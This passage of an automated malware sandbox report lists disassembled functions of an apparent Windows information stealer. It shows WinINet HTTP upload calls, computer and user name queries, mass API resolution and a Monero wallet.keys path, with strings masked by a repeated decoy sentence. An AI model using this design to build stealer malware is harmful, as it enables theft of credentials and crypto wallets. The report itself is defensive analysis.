                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 32074da65ef329ce9a2169481c2d9ce22956dca5cafc0b2b5d24d6d2fb01b344
                                • Instruction ID: 24f79b8c175691ffacd5558058325feb997bef1ad950e153ee04c5e3ad554fce
                                • Opcode Fuzzy Hash: 32074da65ef329ce9a2169481c2d9ce22956dca5cafc0b2b5d24d6d2fb01b344
                                • Instruction Fuzzy Hash: 40A15CB550024C9FD344EFA8FF8AD5637F9FB8C309704851AA605C32A4D639B852FB26
                                Function 00D845C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 d845c0-d84695 RtlAllocateHeap 781 d846a0-d846a6 764->781 782 d846ac-d8474a 781->782 783 d8474f-d847a9 VirtualProtect 781->783 782->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D8460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00D8479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D846B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D846AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D8475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D8477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D845F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D8471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D8466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D8462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D845DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D846C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D8474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D845E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D845D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D84638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D846CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D8473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D846D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D845C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: a84de6ed6e0af61669e2aa44edaec23a961ca905390f7ee93330d7020075aef6
                                • Instruction ID: 55fc6f21b8a1fb3568d9deca267d5ffd9a03a3f37d01fefa8e528dcaeae40b89
                                • Opcode Fuzzy Hash: a84de6ed6e0af61669e2aa44edaec23a961ca905390f7ee93330d7020075aef6
                                • Instruction Fuzzy Hash: 9741EE607C3709FF8E64FBA8A94EEDD77565F47720FD07A44EE0092284CAA059084637
                                Function 00D84880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 d84880-d84942 call d9a7a0 call d847b0 call d9a740 * 5 InternetOpenA StrCmpCA 816 d8494b-d8494f 801->816 817 d84944 801->817 818 d84ecb-d84ef3 InternetCloseHandle call d9aad0 call d89ac0 816->818 819 d84955-d84acd call d98b60 call d9a920 call d9a8a0 call d9a800 * 2 call d9a9b0 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a920 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a9b0 call d9a920 call d9a8a0 call d9a800 * 2 InternetConnectA 816->819 817->816 829 d84f32-d84fa2 call d98990 * 2 call d9a7a0 call d9a800 * 8 818->829 830 d84ef5-d84f2d call d9a820 call d9a9b0 call d9a8a0 call d9a800 818->830 819->818 905 d84ad3-d84ad7 819->905 830->829 906 d84ad9-d84ae3 905->906 907 d84ae5 905->907 908 d84aef-d84b22 HttpOpenRequestA 906->908 907->908 909 d84b28-d84e28 call d9a9b0 call d9a8a0 call d9a800 call d9a920 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a920 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a920 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a9b0 call d9a8a0 call d9a800 call d9a920 call d9a8a0 call d9a800 call d9a740 call d9a920 * 2 call d9a8a0 call d9a800 * 2 call d9aad0 lstrlen call d9aad0 * 2 lstrlen call d9aad0 HttpSendRequestA 908->909 910 d84ebe-d84ec5 InternetCloseHandle 908->910 1021 d84e32-d84e5c InternetReadFile 909->1021 910->818 1022 d84e5e-d84e65 1021->1022 1023 d84e67-d84eb9 InternetCloseHandle call d9a800 1021->1023 1022->1023 1025 d84e69-d84ea7 call d9a9b0 call d9a8a0 call d9a800 1022->1025 1023->910 1025->1021
                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D84839
                                  • Part of subcall function 00D847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D84849
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D84915
                                • StrCmpCA.SHLWAPI(?,0182EB68), ref: 00D8493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D84ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00DA0DDB,00000000,?,?,00000000,?,",00000000,?,0182EA18), ref: 00D84DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D84E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D84E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D84E49
                                • InternetCloseHandle.WININET(00000000), ref: 00D84EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00D84EC5
                                • HttpOpenRequestA.WININET(00000000,0182EB78,?,0182E1B0,00000000,00000000,00400100,00000000), ref: 00D84B15
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • InternetCloseHandle.WININET(00000000), ref: 00D84ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: d9d37ab21e6c89a6f11d9b258dcb62954d1fc0df4723f1a65a2b057452d596d7
                                • Instruction ID: 8a877237b63dd658d55cab167b4eb3098b1d3ff57ebc033507037930e700aaca
                                • Opcode Fuzzy Hash: d9d37ab21e6c89a6f11d9b258dcb62954d1fc0df4723f1a65a2b057452d596d7
                                • Instruction Fuzzy Hash: 30129772920128AADF15EBA4DD92FEEB779FF15300F504199B10662091EF706B49CFB2
                                Function 00D978E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D97910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D97917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00D9792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 453f3a359d03786f7d35f922f500e3d2e9d279654fa38d1a7e4415702f521773
                                • Instruction ID: 44df43bc05b7bd7dd2d9be3f9429d910ea3f11a609bad2c7ab9ea2e20c034aef
                                • Opcode Fuzzy Hash: 453f3a359d03786f7d35f922f500e3d2e9d279654fa38d1a7e4415702f521773
                                • Instruction Fuzzy Hash: 3A0186B1A04208EFDB00DF94DD45FAABBB8F704B15F10421AF545E3280C37459048BA1
                                Function 00D97850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D811B7), ref: 00D97880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D97887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D9789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: c59a3191af30aeb1acfafba679dd5cecd95e3a311e0bfc1e71eb2c23b5d99c40
                                • Instruction ID: 17ecaabf1d6bb87b01dd48362603cecefbd46f50e32aa15fd899ead3b87fbc18
                                • Opcode Fuzzy Hash: c59a3191af30aeb1acfafba679dd5cecd95e3a311e0bfc1e71eb2c23b5d99c40
                                • Instruction Fuzzy Hash: C5F04FB1D4420CAFCB00DF99DE4AFAEBBB8FB04715F10025AFA05A3680C77865048BA1
                                Function 00D81160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 0fcca09766275cbdfb78f1ee86af3117af6fab930dc845c84596fa4c290a1ecb
                                • Instruction ID: f0672c6e0d0638c840ad8a404af8178a14b08d1eec9a559d3bdc41a9f5720371
                                • Opcode Fuzzy Hash: 0fcca09766275cbdfb78f1ee86af3117af6fab930dc845c84596fa4c290a1ecb
                                • Instruction Fuzzy Hash: D2D0677490430C9BCB04ABA5998EA9DBBB8FB08615F101555D90562340EA3165968AA6
                                Function 00D99C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 d99c10-d99c1a 634 d99c20-d9a031 GetProcAddress * 43 633->634 635 d9a036-d9a0ca LoadLibraryA * 8 633->635 634->635 636 d9a0cc-d9a141 GetProcAddress * 5 635->636 637 d9a146-d9a14d 635->637 636->637 638 d9a153-d9a211 GetProcAddress * 8 637->638 639 d9a216-d9a21d 637->639 638->639 640 d9a298-d9a29f 639->640 641 d9a21f-d9a293 GetProcAddress * 5 639->641 642 d9a2a5-d9a332 GetProcAddress * 6 640->642 643 d9a337-d9a33e 640->643 641->640 642->643 644 d9a41f-d9a426 643->644 645 d9a344-d9a41a GetProcAddress * 9 643->645 646 d9a428-d9a49d GetProcAddress * 5 644->646 647 d9a4a2-d9a4a9 644->647 645->644 646->647 648 d9a4ab-d9a4d7 GetProcAddress * 2 647->648 649 d9a4dc-d9a4e3 647->649 648->649 650 d9a515-d9a51c 649->650 651 d9a4e5-d9a510 GetProcAddress * 2 649->651 652 d9a612-d9a619 650->652 653 d9a522-d9a60d GetProcAddress * 10 650->653 651->650 654 d9a61b-d9a678 GetProcAddress * 4 652->654 655 d9a67d-d9a684 652->655 653->652 654->655 656 d9a69e-d9a6a5 655->656 657 d9a686-d9a699 GetProcAddress 655->657 658 d9a708-d9a709 656->658 659 d9a6a7-d9a703 GetProcAddress * 4 656->659 657->656 659->658
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,01815850), ref: 00D99C2D
                                • GetProcAddress.KERNEL32(74DD0000,018159F0), ref: 00D99C45
                                • GetProcAddress.KERNEL32(74DD0000,018296B8), ref: 00D99C5E
                                • GetProcAddress.KERNEL32(74DD0000,018296D0), ref: 00D99C76
                                • GetProcAddress.KERNEL32(74DD0000,01829658), ref: 00D99C8E
                                • GetProcAddress.KERNEL32(74DD0000,01829610), ref: 00D99CA7
                                • GetProcAddress.KERNEL32(74DD0000,0181B6A8), ref: 00D99CBF
                                • GetProcAddress.KERNEL32(74DD0000,0182D290), ref: 00D99CD7
                                • GetProcAddress.KERNEL32(74DD0000,0182D218), ref: 00D99CF0
                                • GetProcAddress.KERNEL32(74DD0000,0182D230), ref: 00D99D08
